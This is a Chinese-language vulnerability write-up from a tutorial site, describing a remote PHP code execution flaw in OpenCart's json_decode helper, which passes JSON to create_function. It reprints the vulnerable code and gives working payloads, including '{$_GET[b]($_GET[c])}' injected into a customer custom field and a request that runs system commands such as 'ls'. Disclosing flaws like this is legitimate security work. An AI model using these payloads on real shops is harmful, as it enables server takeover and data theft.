西部数码主机 | 阿里云主机| 虚拟主机 | 服务器 | 返回乐道官网
当前位置: 主页 > php教程 > OpenCart教程 >

OpenCart json_decode函数中存在远程PHP代码执行漏洞

时间:2016-04-13 00:42来源:未知 作者:好模板 点击:
发现OpenCartjson_decode函数中存在远程PHP代码执行漏洞,涉及到的版本有2.1.0.2到2.2.0.0(最新版本) 漏洞存在于/upload/system/helper/json.php中,其中有这段代码 1 2 3 4 5 6 7 8 9 #/upload/system/helper/json.ph

发现OpenCart json_decode函数中存在远程PHP代码执行漏洞,涉及到的版本有2.1.0.2 到 2.2.0.0 (最新版本)

漏洞存在于 /upload/system/helper/json.php中,其中有这段代码

 

1
2
3
4
5
6
7
8
9
# /upload/system/helper/json.php
$match = '/".*?(?<!\\\\)"/';
$string = preg_replace($match, '', $json);
$string = preg_replace('/[,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]/', '', $string);
...
$function = @create_function('', "return {$json};"); /**** 万恶之源 ****/
$return = ($function) ? $function() : null;
...
return $return;

其中通过json进行了函数的创建,而json_decode函数可被利用

这里是几个简单的测试例子

var_dump(json_decode('{"ok":"1"."2"."3"}'));

 

/uploads/allimg/160413/004120F22-0.png

var_dump(json_decode('{"ok":"$_SERVER[HTTP_USER_AGENT]"}'));

/uploads/allimg/160413/0041204114-1.png

 var_dump(json_decode('{"ok":"{$_GET[b]($_GET[c])}"}'));

 

/uploads/allimg/160413/0041201044-2.png

/uploads/allimg/160413/0041201K3-3.png

/uploads/allimg/160413/0041203037-4.png

 在真实场景中,可以通过/index.php?route=account/edit进行利用

例如将$_SERVER[HTTP_USER_AGENT]作为姓名填写进去,保存(需要重复两次)

/uploads/allimg/160413/0041204J7-5.png

之后当管理员访问管理面板时,他会在最近活动中本应显示你的姓名的地方看到他自己的UserAgent

/uploads/allimg/160413/0041202411-6.png

另一个例子是在account/edit 或者 account/register 中的 custom_field ,在这里进行利用可能是最合适的

如果管理员在/admin/index.php?route=customer/custom_field中添加了一个自定义的区域用于电话号码之类的额外信息

/uploads/allimg/160413/0041205419-7.png

你就可以直接注入你的代码在这个custom_field中

例如将{$_GET[b]($_GET[c])}填写到这个custom_field中,保存

/uploads/allimg/160413/0041203E3-8.png

然后访问

http://host/shop_directory/index.php?route=account/edit&b=system&c=ls

你会看到代码被正确执行了

 

/uploads/allimg/160413/004120NX-9.png

 

/uploads/allimg/160413/00412015b-10.png

(责任编辑:好模板)
顶一下
(1)
100%
踩一下
(0)
0%
------分隔线----------------------------